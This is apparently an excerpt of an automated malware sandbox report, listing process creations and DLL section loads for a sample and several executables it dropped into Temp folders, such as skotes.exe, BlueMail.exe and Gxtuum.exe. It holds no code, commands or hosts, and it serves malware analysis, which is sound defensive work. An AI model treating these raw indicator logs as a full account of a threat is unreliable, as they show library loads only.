Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Section loaded: linkinfo.dll
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Section loaded: ntshrui.dll
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Section loaded: mstask.dll
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Section loaded: dui70.dll
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Section loaded: duser.dll
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Section loaded: chartv.dll
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Section loaded: atlthunk.dll
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Section loaded: version.dll
